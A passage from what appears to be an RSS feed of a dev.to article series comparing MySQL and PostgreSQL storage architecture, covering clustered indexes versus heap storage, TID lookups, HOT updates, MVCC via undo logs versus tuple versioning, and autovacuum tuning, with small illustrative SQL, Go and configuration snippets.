&lt;td&gt;Performance &amp;amp; Simplicity&lt;/td&gt;
&lt;td&gt;Features &amp;amp; Standards Compliance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Target Use Case&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Web applications, read-heavy workloads&lt;/td&gt;
&lt;td&gt;Complex applications, analytics, data integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Philosophy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pragmatic, get it done fast&lt;/td&gt;
&lt;td&gt;Academic, do it right by the standard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Learning Curve&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Low - productive quickly&lt;/td&gt;
&lt;td&gt;Moderate - more to learn&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Configuration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal - sensible defaults&lt;/td&gt;
&lt;td&gt;Flexible - tuning options available&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Both are excellent databases. Choose based on your workload characteristics and team expertise, not on what's "better" in the abstract.&lt;/p&gt;

</description>
      <category>database</category>
      <category>postgres</category>
      <category>mysql</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Part 2 - MySQL vs PostgreSQL: Storage Architecture</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Tue, 14 Oct 2025 10:31:14 +0000</pubDate>
      <link>https://dev.to/harry_do/part-2-mysql-vs-postgresql-storage-architecture-2ki1</link>
      <guid>https://dev.to/harry_do/part-2-mysql-vs-postgresql-storage-architecture-2ki1</guid>
      <description>&lt;p&gt;MySQL and PostgreSQL take fundamentally different approaches to data storage. MySQL (InnoDB) uses a &lt;strong&gt;clustered index architecture&lt;/strong&gt; where table data is physically organized around the primary key, while PostgreSQL uses &lt;strong&gt;heap storage&lt;/strong&gt; where data is stored unordered and all indexes are secondary. This architectural difference profoundly impacts insert performance, query patterns, index design, and maintenance requirements. Understanding these storage models is crucial for optimizing database performance and making informed indexing decisions.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. MySQL: The Clustered Index Approach
&lt;/h2&gt;

&lt;p&gt;MySQL's InnoDB storage engine automatically organizes your table data around the primary key using a clustered index. Think of it like a dictionary where entries are automatically sorted alphabetically — the data itself is stored in order, making lookups by the primary key incredibly fast, but inserting new entries in random order requires shifting things around.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7rskkjf7s6vekg4nzvo.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu7rskkjf7s6vekg4nzvo.jpg" alt=" " width="800" height="475"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Clustered Indexes Work:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Primary Key Clustering:&lt;/strong&gt; InnoDB automatically creates a clustered index on the primary key — this isn't optional, it's the foundation of how InnoDB stores data. If you don't define a primary key, InnoDB will use the first UNIQUE index with all NOT NULL columns. If no suitable index exists, InnoDB generates a hidden 6-byte row ID (GEN_CLUST_INDEX) as the clustered index&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data Storage:&lt;/strong&gt; Table data is physically stored in primary key order, with the actual row data living in the leaf nodes of the B-tree index structure. The non-leaf pages of the B-tree contain index keys and pointers to other pages, while the leaf pages contain the complete row data including all columns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secondary Indexes:&lt;/strong&gt; Each secondary index entry contains the indexed column(s) plus a copy of the primary key value. When you query using a secondary index, InnoDB first searches the secondary index to find the primary key value, then uses that primary key to search the clustered index to retrieve the full row data — a two-step lookup process (secondary index → primary key value → clustered index → row data). This is why keeping primary keys small is crucial — every secondary index stores a copy of it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Index Structure:&lt;/strong&gt; The clustered index B-tree is typically 2-4 levels deep, with data pages themselves forming the leaf level. This means primary key lookups require only 2-4 disk/memory page accesses to reach the actual data&lt;/li&gt;
&lt;/ul&gt;
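&lt;p&gt;The two-step secondary-index lookup described above is easy to see in a small example (names are illustrative):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;-- InnoDB: the secondary index on email stores (email, id) pairs
CREATE TABLE users (
  id BIGINT AUTO_INCREMENT PRIMARY KEY,
  email VARCHAR(255) NOT NULL,
  name  VARCHAR(100),
  INDEX idx_email (email)
);

-- Step 1: idx_email is searched to find the primary key value
-- Step 2: the clustered index is searched by id to fetch the full row
SELECT * FROM users WHERE email = 'a@example.com';

-- A covering query skips step 2: id is already stored in idx_email
SELECT id FROM users WHERE email = 'a@example.com';
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;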

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Lightning Fast Primary Key Lookups:&lt;/strong&gt; Direct access to data without any additional lookup step&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exceptional Range Queries:&lt;/strong&gt; Sequential primary key reads are incredibly fast since data is physically ordered&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Storage Efficiency:&lt;/strong&gt; Data is stored at the index leaf level, eliminating the need for separate data storage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Optimization:&lt;/strong&gt; No configuration required—InnoDB handles everything for you&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Smaller Secondary Indexes:&lt;/strong&gt; Secondary indexes store primary key values instead of row pointers, which can be more efficient for small primary keys&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Random Insert Pain:&lt;/strong&gt; Non-sequential primary keys (like UUIDs) cause frequent page splits and reorganization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secondary Index Overhead:&lt;/strong&gt; Every secondary index lookup requires two steps—first finding the primary key, then looking up the data (unless you use covering indexes that include all needed columns, which eliminates the second lookup)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hotspot Issues:&lt;/strong&gt; High concurrency inserts on sequential keys (like auto-increment IDs) create contention at the "hot" end of the index. Modern MySQL versions (5.7+) mitigate this with "consecutive" lock mode using lightweight mutexes instead of table-level locks, but some contention remains under very high concurrency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Table Fragmentation:&lt;/strong&gt; Random inserts can fragment clustered data over time, degrading performance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Large Primary Keys Are Costly:&lt;/strong&gt; Since every secondary index stores the primary key, large primary keys (like UUIDs) bloat all your indexes&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  2. PostgreSQL: The Heap Storage Approach
&lt;/h2&gt;

&lt;p&gt;PostgreSQL uses heap storage, which means your data is stored in whatever order it arrives; there's no automatic physical ordering. Think of it like throwing papers into a filing cabinet in any order, then using index cards to find what you need. Every index, including the primary key, is just a pointer to the actual location in the heap.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0pbeqrp9jqpreh2oyr8x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0pbeqrp9jqpreh2oyr8x.png" alt=" " width="800" height="632"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Heap Storage Works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No Clustered Indexes:&lt;/strong&gt; PostgreSQL uses heap storage where data is not physically ordered by default. New rows are inserted into any available space in the table (typically at the end, but also in gaps left by deleted rows if there's enough space)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All Indexes Are Secondary:&lt;/strong&gt; Every index, including the primary key, points directly to heap tuple locations using a TID (Tuple Identifier). A TID consists of two components: a block number (which 8KB page in the table file, using the default block size) and an offset number (which slot within that page). For example, TID (5,3) means block 5, slot 3&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Index Structure:&lt;/strong&gt; All indexes are completely separate from data storage, each maintaining its own B-tree structure. An index lookup retrieves the TID, then PostgreSQL uses that TID to fetch the row directly from the heap table by reading the specific block and slot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CLUSTER Command:&lt;/strong&gt; You can manually reorder table data by an index using the CLUSTER command, but it's a one-time operation that doesn't persist as new data arrives. PostgreSQL must rewrite the entire table to cluster it, acquiring an ACCESS EXCLUSIVE lock that blocks all operations during the process&lt;/li&gt;
&lt;/ul&gt;
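&lt;p&gt;The TID-based lookup can be sketched as follows; the heap layout and index contents are toy values for illustration:&lt;/p&gt;

```go
package main

import "fmt"

// TID identifies a heap tuple by block number and slot offset,
// mirroring PostgreSQL's (block, offset) tuple identifier
type TID struct {
	Block  int
	Offset int
}

// a toy heap: blocks of fixed-size pages, each holding row slots
var heap = [][]string{
	{"row-a", "row-b"}, // block 0
	{"row-c"},          // block 1
}

// index entries point straight at heap locations; every index,
// including the primary key, works this way in PostgreSQL
var pkIndex = map[int]TID{
	101: {Block: 0, Offset: 1},
	102: {Block: 1, Offset: 0},
}

// fetch resolves a TID to the stored row in a single step
func fetch(t TID) string {
	return heap[t.Block][t.Offset]
}

func main() {
	fmt.Println(fetch(pkIndex[101]))
}
```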

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Consistent Insert Performance:&lt;/strong&gt; No clustering overhead regardless of key pattern — random or sequential, it doesn't matter&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Direct Index Access:&lt;/strong&gt; All indexes point directly to heap locations with a single lookup&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Better Concurrent Inserts:&lt;/strong&gt; No hotspot issues with sequential keys since there's no physical ordering to maintain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Flexible Access Patterns:&lt;/strong&gt; All columns have equal access performance—no column is "special" like the primary key in MySQL&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No Page Split Drama:&lt;/strong&gt; Inserts don't cause the reorganization headaches that clustered indexes do&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Primary Key Overhead:&lt;/strong&gt; Even primary key lookups require index traversal + heap access (two steps)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No Automatic Clustering:&lt;/strong&gt; Cannot automatically take advantage of physical ordering for range queries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Larger Storage Footprint:&lt;/strong&gt; Separate index and heap storage means more disk space used&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;More Index Maintenance:&lt;/strong&gt; All indexes require separate maintenance — when you update a single row, this is what happens:

&lt;ul&gt;
&lt;li&gt;The old version of the row is marked as "dead"&lt;/li&gt;
&lt;li&gt;A new version of the row is inserted elsewhere in the table with a new physical address (TID)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All indexes on the table must be updated&lt;/strong&gt; to point to this new location&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Important exception:&lt;/strong&gt; PostgreSQL's HOT (Heap-Only Tuple) optimization can avoid index updates when: (1) no indexed columns are modified, AND (2) there's enough free space in the same block to store the new tuple. In this case, the old tuple points to the new tuple within the same page, and indexes don't need updating. If either condition fails (an indexed column changes, or the block is full), all indexes must be updated&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;VACUUM Dependency:&lt;/strong&gt; Requires regular VACUUM operations to reclaim space from dead tuples (more on this below)&lt;/li&gt;

&lt;/ul&gt;
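&lt;p&gt;The HOT decision above boils down to two conditions, which a minimal sketch can make explicit. The function name and boolean inputs are simplifications of what PostgreSQL actually checks per page:&lt;/p&gt;

```go
package main

import "fmt"

// hotEligible reports whether an update can be a Heap-Only Tuple update:
// no indexed column changed, and the page has room for the new version.
func hotEligible(indexedColumnChanged, pageHasFreeSpace bool) bool {
	if indexedColumnChanged {
		return false // every index must be updated
	}
	return pageHasFreeSpace
}

func main() {
	fmt.Println(hotEligible(false, true))  // HOT: indexes untouched
	fmt.Println(hotEligible(true, true))   // indexed column changed
	fmt.Println(hotEligible(false, false)) // page full, new TID needed
}
```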

&lt;h2&gt;
  
  
  3. MVCC: How Each Database Handles Concurrent Access
&lt;/h2&gt;

&lt;p&gt;Both MySQL and PostgreSQL use MVCC (Multi-Version Concurrency Control) to allow simultaneous reads and writes without extensive locking. MVCC works by keeping multiple versions of data rows so that readers can access old versions while writers create new ones. However, the two databases implement this completely differently — MySQL uses a separate undo log, while PostgreSQL stores versions directly in the table.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Is MVCC?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;MVCC is a strategy that allows databases to handle concurrent access without locking readers. Instead of overwriting data, the database keeps old versions around so that ongoing transactions can still see the data as it existed when they started. This requires:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Keeping old versions of data instead of simply overwriting it&lt;/li&gt;
&lt;li&gt;When a row is updated, preserving the original data as an older version while creating a new version&lt;/li&gt;
&lt;li&gt;A mechanism to manage these different row versions&lt;/li&gt;
&lt;li&gt;Eventual cleanup of old versions once no active transaction needs them&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.1. MySQL (InnoDB): Undo Log Approach
&lt;/h3&gt;

&lt;p&gt;MySQL's InnoDB storage engine implements MVCC using a separate undo log — a dedicated space outside the main table where old row versions are stored. Think of it like keeping a separate notebook for your editing history while your main document always shows the latest version.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How InnoDB's Undo Log Works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;In-Place Updates:&lt;/strong&gt; When you update a row, InnoDB modifies the row directly in the main table (the clustered index). The current row in the clustered index always represents the latest committed version&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hidden System Columns:&lt;/strong&gt; InnoDB adds three hidden fields to each row:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;DB_TRX_ID&lt;/code&gt; (6 bytes): Transaction ID of the transaction that last inserted or updated the row&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_ROLL_PTR&lt;/code&gt; (7 bytes): Roll pointer that points to the undo log record containing the previous version&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;DB_ROW_ID&lt;/code&gt; (6 bytes): Monotonically increasing row ID, added only when the table has no primary key or suitable unique index&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Undo Log Storage:&lt;/strong&gt; The old version of the data is written to a separate undo log tablespace, not the main table. Undo logs are organized into rollback segments and can be stored in system tablespace or separate undo tablespaces&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Version Reconstruction:&lt;/strong&gt; When a transaction needs to see an older version (based on its read view/snapshot), InnoDB follows the &lt;code&gt;DB_ROLL_PTR&lt;/code&gt; chain in the undo log to reconstruct the row as it existed at the required point in time. This may require following multiple undo log records if there were multiple updates&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Automatic Cleanup:&lt;/strong&gt; Background "purge" threads (configurable via &lt;code&gt;innodb_purge_threads&lt;/code&gt;, up to 32 threads) automatically clean the undo log once no active transaction needs those old versions. Purge threads also physically remove delete-marked rows from indexes&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Selective Index Updates:&lt;/strong&gt; Only indexes affected by the update need to be modified. For secondary indexes, if the indexed column didn't change, the index entry doesn't need updating&lt;/li&gt;

&lt;/ul&gt;
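&lt;p&gt;The roll-pointer chain walk can be sketched like this. The structs and the read view (modeled here as a simple set of visible transaction IDs) are simplifications of InnoDB's actual undo records and snapshots:&lt;/p&gt;

```go
package main

import "fmt"

// version is one entry in an undo chain: the row value, the transaction
// that wrote it, and a pointer to the previous version (the roll pointer)
type version struct {
	value string
	trxID int
	prev  int // index into the undo slice; -1 means no older version
}

// undo log: index 0 is the oldest version
var undo = []version{
	{value: "v1", trxID: 10, prev: -1},
	{value: "v2", trxID: 20, prev: 0},
}

// current row in the clustered index, updated in place by trx 30
var current = version{value: "v3", trxID: 30, prev: 1}

// reconstruct walks the roll-pointer chain until it finds the newest
// version whose writing transaction is visible to the snapshot
func reconstruct(snapshot map[int]bool) (string, bool) {
	v := current
	for {
		if snapshot[v.trxID] {
			return v.value, true
		}
		if v.prev == -1 {
			return "", false
		}
		v = undo[v.prev]
	}
}

func main() {
	// a read view taken before trx 30 committed: it can see trx 10 and 20
	// but must skip the in-place update from trx 30
	val, ok := reconstruct(map[int]bool{10: true, 20: true})
	fmt.Println(val, ok)
}
```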

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Clean Main Table:&lt;/strong&gt; Your main table only stores the current version, keeping it compact&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Maintenance:&lt;/strong&gt; No manual intervention needed—purge threads handle cleanup automatically&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Faster Updates:&lt;/strong&gt; Updates are generally faster because only affected indexes need updating&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Predictable Performance:&lt;/strong&gt; The undo log is a separate structure with dedicated cleanup processes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Efficient Rollback:&lt;/strong&gt; Rolling back transactions is fast since old versions are readily available&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Undo Log Growth:&lt;/strong&gt; Long-running transactions can cause the undo log to grow extremely large&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Undo Log Contention:&lt;/strong&gt; Heavy write workloads can create contention on undo log access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Delayed Cleanup:&lt;/strong&gt; Long-running read transactions prevent purge threads from cleaning up old versions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hidden Storage Costs:&lt;/strong&gt; The undo log can consume significant disk space during peak periods&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tablespace Management:&lt;/strong&gt; You need to monitor and potentially resize the undo tablespace&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.2. PostgreSQL: Tuple Versioning Approach
&lt;/h3&gt;

&lt;p&gt;PostgreSQL implements MVCC by storing multiple versions of rows directly in the main table itself—a technique called tuple versioning. Think of it like keeping all your document revisions in the same file, with markers showing which version is current and which are old.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How PostgreSQL's Tuple Versioning Works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full Row Copies:&lt;/strong&gt; When you update a row, PostgreSQL creates a completely new copy of the entire row in the table. This is a full physical copy with all columns, not just the changed values&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;In-Table Storage:&lt;/strong&gt; Both the old version (now "dead") and the new version live in the same table file, side by side. Dead tuples remain in place until VACUUM removes them&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transaction Visibility Fields:&lt;/strong&gt; Each tuple header contains critical visibility information:

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;xmin&lt;/code&gt;: Transaction ID that inserted this tuple (when the row version was created)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;xmax&lt;/code&gt;: Transaction ID that deleted or updated this tuple (0 if still current)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;t_ctid&lt;/code&gt;: Points to the newer version of the row if updated, or to itself if it's the current version&lt;/li&gt;
&lt;li&gt;These fields determine which transactions can see this tuple, based on each transaction's snapshot&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;Visibility Rules:&lt;/strong&gt; A tuple is visible to a transaction if:

&lt;ul&gt;
&lt;li&gt;The inserting transaction (&lt;code&gt;xmin&lt;/code&gt;) has committed and is in the transaction's snapshot&lt;/li&gt;
&lt;li&gt;AND the deleting transaction (&lt;code&gt;xmax&lt;/code&gt;) has not committed or is not in the transaction's snapshot&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;All Index Updates:&lt;/strong&gt; Since the new row has a different physical location (TID), &lt;strong&gt;all indexes&lt;/strong&gt; on the table must be updated to point to the new location (except in HOT update cases)&lt;/li&gt;

&lt;li&gt;

&lt;strong&gt;VACUUM Cleanup:&lt;/strong&gt; A VACUUM process (manual or autovacuum) eventually removes dead tuples and reclaims space. VACUUM scans the table, identifies tuples where all active transactions have moved past their &lt;code&gt;xmax&lt;/code&gt;, and marks that space as reusable&lt;/li&gt;

&lt;/ul&gt;
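&lt;p&gt;The visibility rule above can be expressed directly in code. The snapshot is modeled as a set of transaction IDs that are committed and visible, which glosses over the details of PostgreSQL's real snapshot structure:&lt;/p&gt;

```go
package main

import "fmt"

// tuple header fields relevant to visibility, as in PostgreSQL
type tuple struct {
	xmin  int // transaction that created this version
	xmax  int // transaction that deleted/updated it; 0 if current
	value string
}

// visible applies the rule from the text: the creator must be a
// committed transaction in the snapshot, and the deleter must not be
func visible(t tuple, committedInSnapshot map[int]bool) bool {
	if !committedInSnapshot[t.xmin] {
		return false
	}
	if t.xmax == 0 {
		return true
	}
	return !committedInSnapshot[t.xmax]
}

func main() {
	old := tuple{xmin: 100, xmax: 200, value: "old"}
	cur := tuple{xmin: 200, xmax: 0, value: "new"}

	// a snapshot taken before trx 200 committed sees the old version
	before := map[int]bool{100: true}
	fmt.Println(visible(old, before), visible(cur, before))

	// a snapshot taken after trx 200 committed sees the new version
	after := map[int]bool{100: true, 200: true}
	fmt.Println(visible(old, after), visible(cur, after))
}
```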

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Simple Architecture:&lt;/strong&gt; Everything is in one place—no separate undo log to manage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No Version Reconstruction:&lt;/strong&gt; Old versions are complete rows, no need to reconstruct from logs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Predictable Read Performance:&lt;/strong&gt; Reading old versions is straightforward since they're complete tuples&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Better for Short Transactions:&lt;/strong&gt; Works well when transactions are short and VACUUM can keep up&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Core Database Feature:&lt;/strong&gt; MVCC is deeply integrated into PostgreSQL's architecture&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Table Bloat:&lt;/strong&gt; Dead tuples accumulate in the table, causing it to grow and degrade performance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Index Bloat:&lt;/strong&gt; All indexes also bloat because they contain pointers to dead tuples&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;VACUUM Dependency:&lt;/strong&gt; Performance is highly dependent on proper VACUUM tuning and frequency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All Indexes Updated:&lt;/strong&gt; Every update requires updating &lt;strong&gt;every index&lt;/strong&gt; on the table, regardless of which columns changed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Write Amplification:&lt;/strong&gt; A single row update creates a full new copy of the row plus updates all indexes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual Tuning Required:&lt;/strong&gt; You need to carefully tune autovacuum settings for write-heavy workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.3. MVCC Comparison: Side by Side
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;MVCC Feature&lt;/th&gt;
&lt;th&gt;MySQL (InnoDB)&lt;/th&gt;
&lt;th&gt;PostgreSQL&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Implementation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Undo Log - Engine-specific, separate from table&lt;/td&gt;
&lt;td&gt;Tuple Versioning - Core architecture, in-table&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Update Method&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;In-place modification, old data to undo log&lt;/td&gt;
&lt;td&gt;Full new row copy, old version marked dead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Version Storage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Separate undo log space&lt;/td&gt;
&lt;td&gt;Within the main table file&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Old Version Format&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Delta/changes only&lt;/td&gt;
&lt;td&gt;Complete row copy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cleanup Mechanism&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic background purge threads&lt;/td&gt;
&lt;td&gt;VACUUM process (autovacuum or manual)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Index Updates per Update&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Only affected indexes&lt;/td&gt;
&lt;td&gt;All indexes on the table&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Main Storage Impact&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Main table stays compact&lt;/td&gt;
&lt;td&gt;Table grows with dead tuples&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Maintenance Requirement&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Minimal (mostly automatic)&lt;/td&gt;
&lt;td&gt;Requires VACUUM tuning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bloat Risk&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Undo log can grow large&lt;/td&gt;
&lt;td&gt;Table and all indexes can bloat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best For&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Mixed workloads, long transactions&lt;/td&gt;
&lt;td&gt;Short transactions, read-heavy workloads&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why This Matters:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Understanding these MVCC differences is crucial for performance tuning:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;MySQL's Challenge:&lt;/strong&gt; Long-running transactions prevent undo log cleanup, causing the undo log to grow indefinitely. Monitor your slowest queries and transactions to prevent this.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;PostgreSQL's Challenge:&lt;/strong&gt; Write-heavy workloads create dead tuples faster than autovacuum can clean them, leading to severe bloat. You need aggressive autovacuum tuning (lower &lt;code&gt;autovacuum_vacuum_scale_factor&lt;/code&gt;, higher &lt;code&gt;autovacuum_max_workers&lt;/code&gt;) and potentially manual VACUUM during maintenance windows.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Design Impact:&lt;/strong&gt; In PostgreSQL, avoid adding unnecessary indexes since every index adds overhead on updates. In MySQL, be mindful of long-running read transactions that hold up undo log cleanup.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
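&lt;p&gt;As a starting point, aggressive autovacuum tuning might look like the fragment below. These values are illustrative only; the right settings depend on your table sizes and write rates:&lt;/p&gt;

```conf
# postgresql.conf -- illustrative autovacuum tuning for a write-heavy workload
autovacuum_vacuum_scale_factor = 0.05  # default 0.2: vacuum after 5% of rows change, not 20%
autovacuum_max_workers = 6             # default 3: allow more tables to be vacuumed in parallel
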